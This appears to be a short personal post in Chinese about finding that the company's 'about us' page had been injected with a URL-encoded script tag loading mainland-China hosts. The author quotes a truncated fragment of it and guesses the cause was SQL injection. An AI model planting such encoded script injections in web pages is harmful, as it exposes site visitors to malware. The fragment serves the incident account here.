最近使用Google Chrome瀏覽器瀏覽網頁,突然心血來潮。自從將公司網頁的維護交給別人後,就沒有再進去過公司的網頁,
一進入網站,正要瀏覽公司簡介時,Chrome告訴我網頁疑似被植入惡意程式,並且引入的網址都是大陸的網站,
此時引起我的興趣,試著瀏覽公司其他的頁面卻沒有這樣的情形。
於是開啟公司簡介網頁的原始碼,發現最後一行非常可疑,初看好像都是亂碼,但是原來是ASCII碼,
試著解碼後,發現是一堆大陸的網址,不過因為公司內部有防火牆,無法連上80以外的Port,試著打HTTP://也連不上這些網址。
接著下載網路側錄程式,記錄每一個封包,檢查封包的內容,發現真的會向這些網址請求服務,
但是回傳都是401找不到網頁的訊息,最後一行大致如下:
script src=igg%6Fle%2E%63%6E...
查了google,好像是SQL Injection的攻擊。